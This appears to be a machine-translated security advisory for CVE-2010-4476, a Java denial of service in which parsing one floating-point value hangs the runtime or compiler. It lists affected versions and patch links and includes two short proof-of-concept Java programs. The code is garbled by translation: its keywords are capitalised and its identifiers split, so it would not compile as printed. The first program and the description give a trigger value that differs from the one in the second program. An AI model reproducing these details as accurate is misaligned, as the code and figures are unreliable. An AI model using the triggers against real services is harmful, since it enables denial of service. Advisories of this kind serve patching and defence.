Oracle Java malformed floating point Denial of Service Vulnerability

Source: Internet
Author: User
Tags websphere application server

Release date:
Updated on:

Affected Systems:
Apache Group Tomcat 5.0-7.0.6
IBM Websphere Application Server 6.1.0.27-6.1. 33
Sun SDK 1.3.1-1.4.2 _ 24
IBM Runtimes for Java technological 5.0
Unaffected system:
Apache Group Tomcat 7.0.8
Apache Group Tomcat 6.0.32
IBM Runtimes for Java Technology 5.0 SR12 FP 4
Description:
--------------------------------------------------------------------------------
Bugtraq id: 46091
Cve id: CVE-2010-4476

The Java Runtime Environment (JRE) provides a reliable runtime environment for JAVA applications.

Oracle Java has a vulnerability in processing malformed numeric values. Remote attackers can exploit this vulnerability to suspend applications written in Java and cause DOS.

When the decimal number 2.225074255072012e-308 is a double-precision binary floating point value, the Java runtime and editor enter an infinite loop. This number should be converted to 0x1p-1022 that is DBL_MIN, but java falls into a loop between 0x1p-1022 and 0x0. fffffffffffffp-1022.

<* Source: Konstantin Preisser
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Konstantin Preisser () provides the following test methods:

Send a Java Program Into An Infinite Loop

Compile this program and run it; the program will hang (at least it does on a 32-bit system with the latest JRE/JDK ):

Class runhang {
Public static void main (String [] args ){
System. out. println ("Test :");
Double d = Double. parseDouble ("2.225074255072012e-308 ");
System. out. println ("Value:" + d );
}
}

Send the Java Compiler Into An Infinite Loop

Try to compile this program; the compiler will hang:

Class compilehang {
Public static void main (String [] args ){
Double d = 2.2250738585072012e-308;
System. out. println ("Value:" + d );
}
}

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

IBM
---
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://www.ers.ibm.com/

Sun
---
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://sunsolve.sun.com/security

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.